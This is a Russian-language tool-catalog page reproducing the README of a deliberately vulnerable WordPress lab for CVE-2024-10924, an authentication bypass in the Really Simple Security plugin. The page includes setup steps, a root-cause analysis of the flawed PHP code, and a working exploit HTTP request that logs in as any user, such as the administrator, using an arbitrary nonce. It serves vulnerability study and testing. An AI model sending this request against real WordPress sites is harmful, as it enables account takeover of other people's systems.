Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
wordpress-really-simple-security-authn-bypass-vulnerable-application — ПРЕДУПРЕЖДЕНИЕ: Это уязвимое приложение для тестирования эксплойта для Really Simple Security < 9.1.2 обхода аутентификации (CVE-2024-10924). Запускайте его на свой страх и риск! | Kitploit
Инструменты/GitHubGitHub/m3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияЛаборатории и Практика
GitHubm3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application

wordpress-really-simple-security-authn-bypass-vulnerable-application

ПРЕДУПРЕЖДЕНИЕ: Это уязвимое приложение для тестирования эксплойта для Really Simple Security < 9.1.2 обхода аутентификации (CVE-2024-10924). Запускайте его на свой страх и риск!

Репозиторий
811 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

wordpress-really-simple-security-authn-bypass-vulnerable-application

Это уязвимое приложение для тестирования эксплойта для обхода аутентификации Really Simple Security < 9.1.2 (CVE-2024-10924).

ПРЕДУПРЕЖДЕНИЕ!

Это приложение содержит серьезные уязвимости безопасности. Запускайте его на свой страх и риск! Рекомендуется использовать среду с резервным копированием и изоляцией (например, виртуальную машину с недавним снимком и сетью только для хоста). Не загружайте это приложение на серверы, доступные из Интернета, так как они будут скомпрометированы.

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Я не несу ответственности за то, как кто-либо использует это приложение. Единственная цель этого приложения — быть тестовым сценарием для эксплойта обхода аутентификации Really Simple Security < 9.1.2 (CVE-2024-10924), и оно не должно использоваться со злым умыслом. Если ваш сервер будет скомпрометирован в результате установки этого приложения, это не моя ответственность, это ответственность лица(лиц), загрузивших и установивших его.

Информация об уязвимости

  • CVE-ID: CVE-2024-10924
  • Link: https://www.cve.org/CVERecord?id=CVE-2024-10924
  • Description: Это позволяет неаутентифицированным злоумышленникам войти в систему как любой существующий пользователь, например администратор, когда включена настройка "Двухфакторная аутентификация" (отключена по умолчанию).
  • Fix: https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
  • Wordfence bulletin: https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass
  • Использование

    Вот шаги для настройки среды:

    1. Запустите ./up.sh для запуска композиции.
    2. Завершите установку WordPress здесь: https://localhost:1337/wp-admin/install.php.
    3. Войдите в WordPress.
    4. Перейдите в "Плагины": https://localhost:1337/wp-admin/plugins.php.
    5. Нажмите "Активировать" под плагином "Really Simple Security". НЕ ОБНОВЛЯЙТЕ ЕГО, так как нам нужна уязвимая версия.
    6. Нажмите "Отмена" во всплывающем окне, касающемся активации SSL.
    7. Перейдите в "Настройки" > "Защита входа" > "Двухфакторная аутентификация" и в разделе "Двухфакторная аутентификация" включите "Включить двухфакторную аутентификацию".
    8. Нажмите кнопку "Сохранить".

    Контейнер будет называться vuln-wp-really-simple-security.

    Чтобы удалить среду, используйте команду ./down.sh или команду ./down_and_delete.sh, чтобы также удалить образы и том базы данных.

    Первопричина

    Посмотрев на исправление, можно понять, что в уязвимой версии функция check_login_and_get_user() возвращала объект ошибки в случае недействительного логин-нонса, не прерывая всю операцию.

    root@kitploit:~
    private function check_login_and_get_user( int $user_id, string $login_nonce ) {
        if ( ! Rsssl_Two_Fa_Authentication::verify_login_nonce( $user_id, $login_nonce ) ) {
            return new WP_REST_Response( array( 'error' => 'Invalid login nonce' ), 403 );
        }
    
        /**
         * Get the user by the user ID.
         *
         * @var WP_User $user
         */
        $user = get_user_by( 'id', $user_id );
        return $user;
    }
    

    В вызывающем коде, кстати, не выполнялось проверки вывода функции check_login_and_get_user() (строка 277), а просто продолжалось выполнение с функцией authenticate_and_redirect() (строка 278), используя то же значение, полученное из входных данных для ID пользователя.

    root@kitploit:~
    public function skip_onboarding( WP_REST_Request $request ): WP_REST_Response {
    	$parameters = new Rsssl_Request_Parameters( $request );
    	// As a double we check the user_id with the login nonce.
    	$user = $this->check_login_and_get_user( (int)$parameters->user_id, $parameters->login_nonce );
    	return $this->authenticate_and_redirect( $parameters->user_id, $parameters->redirect_to );
    }
    

    Эксплойт

    Для эксплуатации уязвимости достаточно запроса, подобного следующему.

    root@kitploit:~
    POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
    Host: localhost:1337
    Content-Type: application/json
    Content-Length: 88
    Connection: keep-alive
    
    {
        "user_id": 1,
        "login_nonce": "133333337",
        "redirect_to": "/wp-admin/"
    }
    

    Затем соответствующим образом установите полученные сессионные куки в браузере.

    user_id должен быть ID целевого пользователя, login_nonce может быть любым, так как неверное значение не заблокирует процесс.

    Скрипт эксплойта на Python можно найти здесь.

    Авторы

    • Antonio Francesco Sardella - реализация - m3ssap0

    Лицензия

    Этот проект лицензирован под лицензией Unlicense - подробности см. в файле LICENSE.

    Благодарности

    • István Márton, исследователь безопасности, обнаруживший уязвимость.
    Скачать инструмент